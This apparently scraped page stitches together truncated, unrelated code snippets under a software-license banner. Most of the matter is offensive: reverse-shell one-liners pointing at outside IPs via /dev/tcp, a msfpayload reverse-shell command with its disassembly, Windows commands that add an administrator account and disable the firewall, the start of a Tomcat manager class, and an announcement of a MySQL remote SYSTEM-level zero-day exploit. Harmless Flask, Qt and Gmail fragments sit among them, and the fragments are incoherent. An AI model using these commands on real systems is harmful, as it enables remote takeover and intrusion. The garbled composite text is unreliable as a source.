🔔 NOTE: If you can, please buy software license to support the authors/developers!
- Go to menu Help > Enter License.
- Copy the license key below and paste it into the textbox > Click the Use License button.
| from flask import Flask | |
| from flask.ext.sqlalchemy import SQLAlchemy | |
| from flask.ext import admin, wtf | |
| from flask.ext.admin.contrib import sqlamodel | |
| app = Flask(__name__) | |
| app.config['SECRET_KEY'] = '123456790' | |
| app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.sqlite' | |
| db = SQLAlchemy(app) |
| #!/usr/bin/env ruby | |
| require 'ronin/network/tcp' | |
| require 'ronin/ui/output/helpers' | |
| require 'combinatorics' | |
| include Ronin::Network::TCP, | |
| Ronin::UI::Output::Helpers | |
| hosts = %w[ |
| root@xstpl:~# msfpayload linux/x86/shell/reverse_nonx_tcp LHOST=192.168.1.1 LPORT=4444 R > reverse_nonx_tcp.bin | |
| root@xstpl:~# ndisasm -b32 -p intel reverse_nonx_tcp.bin | |
| 00000000 31DB xor ebx,ebx ; | |
| 00000002 53 push ebx ; protocol = 0 | |
| 00000003 43 inc ebx ; int socket(int domain, int type, int protocol); | |
| 00000004 53 push ebx ; type = SOCK_STREAM | |
| 00000005 6A02 push byte +0x2 ; domain = AF_UNIX | |
| 00000007 6A66 push byte +0x66 ; int socketcall(int call, unsigned long *args); | |
| 00000009 58 pop eax ; call = 1 (socket) | |
| 0000000A 89E1 mov ecx,esp ; args = domain, type, protocol ;struct sockaddr_in { |
| #bash | |
| /bin/sh -i >& /dev/tcp/200.93.248.46/83 0>&1 >>> nc -vvlp 83 | |
| #bash | |
| bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 | |
| #bash alt | |
| exec /bin/bash 0&0 2>&0 | |
| #bash alt 2 |
| #add a user | |
| net user xstpl mwcb /add | |
| #add user to local administrators | |
| net localgroup administrators /add xstpl | |
| #remove firewall | |
| netsh firewall set opmode disable | |
| #enabled remote desktop |
| --- ./qt-everywhere-opensource-src-4.8.6/src/gui/kernel/qcocoaapplicationdelegate_mac.mm 2014-06-12 10:20:38.000000000 +0300 | |
| +++ ./qt-everywhere-opensource-src-4.8.6/src/gui/kernel/qcocoaapplicationdelegate_mac.mm 2014-06-12 21:59:18.000000000 +0300 | |
| @@ -122,7 +122,7 @@ | |
| [dockMenu release]; | |
| [qtMenuLoader release]; | |
| if (reflectionDelegate) { | |
| - [NSApp setDelegate:reflectionDelegate]; | |
| + [[NSApplication sharedApplication] setDelegate:reflectionDelegate]; | |
| [reflectionDelegate release]; | |
| } |
🔔 NOTE: If you can, please buy software license to support the authors/developers!
| smtp mail sending in cPython blocks the GIL. | |
| This code is tested on python 2.7.8 and I'm using it with web2py | |
| If you use Google Apps for your domain email and if you have admin access, you can easily use the gmail api. | |
| Because you have admin access, you can create a "service account" in the Google Developer Console. | |
| This makes authentication easy. | |
| There are other authorisation methods when you don't have admin access, but they require interaction from the user via a browser. | |
| To use this, you need to install these modules (From PyPI): | |
| pyOpenSSL |
| import os | |
| import urllib2, base64 | |
| import sys | |
| import urllib | |
| class TomcatManager(object): | |
| def __init__(self, endpoint, username, password): | |
| self.endpoint = endpoint |
| *** | |
| FARLiGHT ELiTE HACKERS LEGACY R3L3ASE | |
| *** | |
| Attached is the MySQL Windows Remote Exploit (post-auth, udf | |
| technique) including the previously released mass scanner. | |
| The exploit is mirrored at the farlight website http://www.farlight.org. | |
| Oracle MySQL on Windows Remote SYSTEM Level Exploit zeroday | |
| All owned By Kingcope |